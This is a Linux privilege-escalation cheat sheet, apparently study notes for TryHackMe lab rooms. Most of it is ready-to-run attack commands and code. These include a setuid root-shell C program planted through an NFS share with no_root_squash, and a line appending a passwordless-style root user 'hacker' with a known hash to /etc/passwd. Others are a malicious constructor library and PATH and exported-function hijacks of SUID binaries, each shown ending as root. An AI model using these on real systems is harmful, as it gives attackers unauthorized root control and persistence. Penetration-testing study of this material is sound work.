Skip to content

Linux Privilege Escalation

PrivEsc: Exploits

  1. Identify the kernel version
  2. Search and find an exploit code for the kernel version of the target system
  3. Run the exploit

PrivEsc: Sudo

  1. sudo -l
  2. https://gtfobins.github.io/
  3. Leverage LD_PRELOAD
  4. Use can run script as other user sudo -u <user-name> /opt/script/script.sh

PrivEsc: SUID

If the SUID permissions are set, the binary will run with the permissions of the file owner, check https://gtfobins.github.io/

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

PrivEsc: Capabilities

  1. run getcap -r / 2>/dev/null
  2. check https://gtfobins.github.io/

PrivEsc: Ld_preload

  • sudo -l
  • http://michalszalkowski.com/security/linux/leverage-ld-preload/

PrivEsc: Cron

  • cat /etc/crontab
  • cat /etc/cron*
  • Type of exploits that we can use
    • Check perminission of script that is executed, if you can overwrite it, you win
    • Check the path to the script that is executed, if you can update PATH, you win

PrivEsc: PATH

  1. What folders are located under $PATH
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?
    echo $PATH
    find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
    find / -writable 2>/dev/null | grep 'home'
    export PATH=/tmp:$PATH
    

PrivEsc: NFS

  1. run cat /etc/exports
  2. check if any share has no_root_squash
  3. if yes mount that share
    mkdir -p /tmp/nfs_hacked
    sudo mount -t nfs $(target):/home /tmp/nfs_hacked
    sudo umount /tmp/nfs_hacked
    
  4. create nfs.c file in that share
    int main() 
    {
       setgid(0);
       setuid(0);
       system("/bin/bash");
       return 0;
    }
    
  5. compile
    sudo sudo
    gcc nfs.c -o nfs -w
    chmod +s nfs
    
  6. go to target machine and execute nfs

PrivEsc: Writable files

/etc/passwd

Generate a password with one of the following commands.

openssl passwd -1 -salt hacker hacker
# mkpasswd -m SHA-512 hacker
# python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Add user hacker to passwd
echo 'hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash' >> /etc/passwd
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

PrivEsc: Hijack shared library

find all binaris with suid

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-s
for each interesting finding, check stack trace
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
#-> open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
#-> open("/lib/libc.so.6", O_RDONLY)        = 3
#-> open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
- as you see shared library libcalc.so from /home/user/.config/ is missing recreate missing libcalc.so
echo '#include <stdio.h>' > libcalc.c
echo '#include <stdlib.h>' >> libcalc.c
echo '' >> libcalc.c
echo 'static void inject() __attribute__((constructor));' >> libcalc.c
echo '' >> libcalc.c
echo 'void inject() {' >> libcalc.c
echo '    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");' >> libcalc.c
echo '}' >> libcalc.c
compile
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
execute binary
/usr/local/bin/suid-so
whoami
#-> root

PrivEsc: Hijack service

find all binaris with suid

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816762 8 -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
for each interesting finding, check stack
strings /usr/local/bin/suid-env
#-> fffff.
#-> l$ L
#-> t$(L
#-> |$0H
#-> service apache2 start     <- -------------------------- TARGET
create malisus service
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
cd /tmp
gcc /tmp/service.c -o /tmp/service
update path
export PATH=/tmp:$PATH
execute
/usr/local/bin/suid-env
whoami
#-> root

PrivEsc: Hijack service path

find all binaris with suid

find / -type f -perm -04000 -ls 2>/dev/null
#-> 816764 8 -rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2
for each interesting finding, check stack
strings /usr/local/bin/suid-env2
#-> l$ L
#-> t$(L
#-> |$0H
#-> /usr/sbin/service apache2 start <- --------------------- TARGET
create malicious function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
execute
/usr/local/bin/suid-env2
whoami
#-> root

  • https://tryhackme.com/room/linprivesc
  • https://tryhackme.com/room/linuxprivescarena